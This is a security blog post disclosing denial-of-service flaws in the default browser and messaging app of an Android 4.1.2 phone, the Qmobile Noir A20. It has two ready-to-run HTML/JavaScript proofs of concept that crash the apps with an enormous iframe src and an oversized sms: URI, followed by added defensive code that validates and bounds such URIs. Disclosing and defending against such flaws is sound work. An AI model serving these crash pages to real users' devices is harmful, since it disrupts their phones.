Android Browser + Messaging App DoS
While being impressed by Collin Mulliner's research on smartphones, I found myself very curious trying to find vulnerabilities inside them, and I found several. In this short blog post I will discuss DoS vulnerabilities in the default browser and the messaging app of the Qmobile Noir A20. The Qmobile Noir A20 runs Android 4.1.2. The flaw itself is present in pre-KitKat browsers as well as the default messaging app; however, most of the Qmobile smartphones released with or shortly after the Noir A20 are most likely using the same browser version and messaging app.
Android Browser DoS
The vulnerability is a simple denial-of-service issue caused by writing an overly long iframe src string to the DOM: the loop below builds a src attribute of roughly 3.4 million characters (100,000 iterations of a 34-character chunk) and hands it to document.write. Here is the POC:
<html>
<head>
<title>Android Browser DOS</title>
</head>
<body>
<script>
frame = "<iframe src=\"test:";
for (i = 0; i < 100000; i++) {
    frame = frame + "0000000000000000000000000000000000"; // Long string of numbers
}
frame = frame + "\" width=125 height=125></iframe>"; // Append the closing part of the tag to the result of the loop
document.write(frame); // Write the value of frame to the DOM
</script>
</body>
</html>
Messaging App DoS
The sms: URI scheme (RFC 5724) lets a web page hand a recipient number, and optionally a message body, to the phone's messaging app. During my tests, I concluded that the default messaging app for the Qmobile Noir A20 is not able to handle long strings sent via the sms: scheme. Please note that this is a partly recoverable DoS, and the exact conditions that trigger it are not yet known. Here is the POC:
<html>
<head>
<title>Android Browser SMS Protocol Denial Of Service</title>
</head>
<body>
<script>
frame = "<iframe src=\"sms:";
for (i = 0; i < 30000; i++) {
    frame = frame + "+12345678912222222222222"; // Repeat the number chunk to build an overly long sms: URI
}
frame = frame + "\"></iframe><iframe src='sms:+1234567891212121222222222'></iframe>"; // Close the tag and add a second, short sms: iframe
document.write(frame); // Write both iframes to the DOM
</script>
</body>
</html>
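Both POCs above work because something downstream of the page (the browser when it parses a multi-megabyte src attribute, the messaging app when it receives a huge sms: URI) accepts input without any bound on its size or shape. The following is an added example, not code from the original post or from the Qmobile firmware: a defensive gate for iframe src values plus a parser for sms: URIs that loosely follows the RFC 5724 grammar, of the kind a WebView host app or a link-dispatching layer could run before forwarding a URI. The limits (MAX_URI_LENGTH, MAX_RECIPIENTS, the scheme allow-list) and the function names are assumptions chosen for illustration, not values taken from Android or the RFC; the E.164 15-digit ceiling is the real one.

```javascript
// Added example (not from the original post): bound and validate URIs before
// dispatching them. All numeric limits below are assumptions for illustration.

const MAX_URI_LENGTH = 2048;    // assumed cap on any URI we are willing to dispatch
const MAX_RECIPIENTS = 10;      // assumed cap on recipients in one sms: link
const MAX_E164_DIGITS = 15;     // E.164 international numbers carry at most 15 digits
const ALLOWED_FRAME_SCHEMES = ["http", "https"]; // assumed allow-list for iframe src

// Global number: "+" then 1..MAX_E164_DIGITS digits, first digit non-zero.
const E164_RE = new RegExp("^\\+[1-9]\\d{0," + (MAX_E164_DIGITS - 1) + "}$");

// Gate for anything that ends up in an iframe src attribute. Rejects oversized
// values (POC 1) and schemes such as test: or sms: that a frame should never
// dispatch to an external handler.
function isSafeFrameSrc(src) {
  if (typeof src !== "string" || src.length === 0) return false;
  if (src.length > MAX_URI_LENGTH) return false;
  const m = /^([a-z][a-z0-9+.-]*):/i.exec(src);
  if (!m) return true; // no scheme: a relative URL, nothing to dispatch externally
  return ALLOWED_FRAME_SCHEMES.includes(m[1].toLowerCase());
}

// Parse "sms:<recipient>[,<recipient>...][?body=...]" (RFC 5724 shape).
// Returns { ok: true, recipients, body } or { ok: false, reason }.
function parseSmsUri(uri) {
  if (typeof uri !== "string") return { ok: false, reason: "not a string" };
  if (uri.length > MAX_URI_LENGTH) return { ok: false, reason: "uri too long" };
  if (!/^sms:/i.test(uri)) return { ok: false, reason: "not an sms: uri" };

  const rest = uri.slice(4);
  const qIdx = rest.indexOf("?");
  const recipientPart = qIdx === -1 ? rest : rest.slice(0, qIdx);
  const query = qIdx === -1 ? "" : rest.slice(qIdx + 1);

  if (recipientPart.length === 0) return { ok: false, reason: "no recipient" };
  const parts = recipientPart.split(",");
  if (parts.length > MAX_RECIPIENTS) return { ok: false, reason: "too many recipients" };

  const recipients = [];
  for (const r of parts) {
    // RFC 5724 permits "-" and "." as visual separators; strip them first.
    const stripped = r.replace(/[-.]/g, "");
    if (!E164_RE.test(stripped)) {
      return { ok: false, reason: "bad recipient: " + r.slice(0, 40) };
    }
    recipients.push(stripped);
  }

  let body = "";
  for (const kv of query.split("&")) {
    if (!kv) continue;
    const eq = kv.indexOf("=");
    const key = eq === -1 ? kv : kv.slice(0, eq);
    const val = eq === -1 ? "" : kv.slice(eq + 1);
    if (key.toLowerCase() === "body") {
      try {
        body = decodeURIComponent(val);
      } catch (e) {
        return { ok: false, reason: "bad body encoding" };
      }
    }
  }
  return { ok: true, recipients: recipients, body: body };
}

// Rebuild the recipient string from POC 2 so its rejection can be checked.
function buildPocSmsUri(repeats) {
  let uri = "sms:";
  for (let i = 0; i < repeats; i++) uri += "+12345678912222222222222"; // same chunk as the POC
  return uri;
}
```

With these checks in front of the dispatcher, the 30,000-chunk sms: URI from the second POC fails the length check before any parsing happens, and even a single chunk of it fails as a recipient because 23 digits exceed the E.164 limit; a well-formed link such as sms:+1-555-123-4567,+44.20.7946.0958?body=Hello%20there passes with both numbers normalised and the body decoded.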
References
- Collin Mulliner, iPhone Safari phone-auto-dial vulnerability advisory: http://mulliner.org/security/advisories/iphone_safari_phone-auto-dial_vulnerability_advisory.txt
- RFC 5724, URI Scheme for GSM Short Message Service (SMS): https://www.ietf.org/rfc/rfc5724.txt